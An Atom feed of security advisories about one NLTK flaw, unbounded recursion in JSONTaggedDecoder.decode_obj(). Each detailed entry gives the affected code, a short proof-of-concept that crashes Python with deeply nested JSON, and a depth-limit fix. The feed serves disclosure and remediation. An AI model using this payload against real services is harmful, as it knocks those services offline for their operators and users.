<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
  <id>https://cve.radiocsirt.org/rss/recent/all/10</id>
  <title>Most recent entries from all</title>
  <updated>2026-10-03T21:58:19.860877+00:00</updated>
  <author>
    <name>Vulnerability-Lookup</name>
    <email>csirt@opendfir.org</email>
  </author>
  <link href="https://cve.radiocsirt.org" rel="alternate"/>
  <generator uri="https://lkiesow.github.io/python-feedgen" version="1.0.0">python-feedgen</generator>
  <subtitle>Contains only the most 10 recent entries.</subtitle>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/brew-acronym-cve-2026-66393</id>
    <title>BREW-acronym-CVE-2026-66393 — Natural Language Toolkit (NLTK) has unbounded recursion in JSONTaggedDecoder.decode_obj() may cause DoS</title>
    <updated>2026-10-03T21:58:19.940634+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> Homebrew: acronym</p>
<p>### Summary
`JSONTaggedDecoder.decode_obj()` in `nltk/jsontags.py` calls itself 
recursively without any depth limit. A deeply nested JSON structure 
exceeding `sys.getrecursionlimit()` (default: 1000) will raise an 
unhandled `RecursionError`, crashing the Python process.</p>
<p>### Affected code
File: `nltk/jsontags.py`, lines 47–52
```python
@classmethod
def decode_obj(cls, obj):
    if isinstance(obj, dict):
        obj = {key: cls.decode_obj(val) for (key, val) in obj.items()}
    elif isinstance(obj, list):
        obj = list(cls.decode_obj(val) for val in obj)
```</p>
<p>### Proof of Concept
```python
import sys, json
from nltk.jsontags import JSONTaggedDecoder</p>
<p>depth = sys.getrecursionlimit() + 50  # e.g. 1050
payload = '{"x":' * depth + "null" + "}" * depth</p>
<p># Raises RecursionError, crashing the process
json.loads(payload, cls=JSONTaggedDecoder)
```</p>
<p>### Impact
Any code path that passes externally-supplied JSON to 
`JSONTaggedDecoder` is vulnerable to denial of service.
The severity depends on whether such a path exists in the 
calling code (e.g. `nltk/data.py`).</p>
<p>### Suggested Fix
Add a depth parameter with a hard limit:
```python
@classmethod
def decode_obj(cls, obj, _depth=0):
    if _depth &gt; 100:
        raise ValueError("JSON nesting too deep")
    if isinstance(obj, dict):
        obj = {key: cls.decode_obj(val, _depth + 1) 
               for (key, val) in obj.items()}
    elif isinstance(obj, list):
        obj = list(cls.decode_obj(val, _depth + 1) for val in obj)
```</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/brew-acronym-cve-2026-66393"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/cve-2026-66393</id>
    <title>CVE-2026-66393 — NLTK before 3.9.4 Denial of Service via JSONTaggedDecoder</title>
    <updated>2026-10-03T21:58:19.940711+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> nltk</p>
<p>NLTK versions before 3.9.4 contain an unbounded recursion vulnerability in JSONTaggedDecoder.decode_obj() that allows attackers to cause denial of service by supplying deeply nested JSON structures. Attackers can craft JSON payloads exceeding the recursion limit to trigger an unhandled RecursionError that crashes the Python process.</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/cve-2026-66393"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/ghsa-rf74-v2fm-23pw</id>
    <title>GHSA-rf74-v2fm-23pw — Natural Language Toolkit (NLTK) has unbounded recursion in JSONTaggedDecoder.decode_obj() may cause DoS</title>
    <updated>2026-10-03T21:58:19.940742+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> PyPI: nltk</p>
<p>### Summary
`JSONTaggedDecoder.decode_obj()` in `nltk/jsontags.py` calls itself 
recursively without any depth limit. A deeply nested JSON structure 
exceeding `sys.getrecursionlimit()` (default: 1000) will raise an 
unhandled `RecursionError`, crashing the Python process.</p>
<p>### Affected code
File: `nltk/jsontags.py`, lines 47–52
```python
@classmethod
def decode_obj(cls, obj):
    if isinstance(obj, dict):
        obj = {key: cls.decode_obj(val) for (key, val) in obj.items()}
    elif isinstance(obj, list):
        obj = list(cls.decode_obj(val) for val in obj)
```</p>
<p>### Proof of Concept
```python
import sys, json
from nltk.jsontags import JSONTaggedDecoder</p>
<p>depth = sys.getrecursionlimit() + 50  # e.g. 1050
payload = '{"x":' * depth + "null" + "}" * depth</p>
<p># Raises RecursionError, crashing the process
json.loads(payload, cls=JSONTaggedDecoder)
```</p>
<p>### Impact
Any code path that passes externally-supplied JSON to 
`JSONTaggedDecoder` is vulnerable to denial of service.
The severity depends on whether such a path exists in the 
calling code (e.g. `nltk/data.py`).</p>
<p>### Suggested Fix
Add a depth parameter with a hard limit:
```python
@classmethod
def decode_obj(cls, obj, _depth=0):
    if _depth &gt; 100:
        raise ValueError("JSON nesting too deep")
    if isinstance(obj, dict):
        obj = {key: cls.decode_obj(val, _depth + 1) 
               for (key, val) in obj.items()}
    elif isinstance(obj, list):
        obj = list(cls.decode_obj(val, _depth + 1) for val in obj)
```</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/ghsa-rf74-v2fm-23pw"/>
  </entry>
</feed>
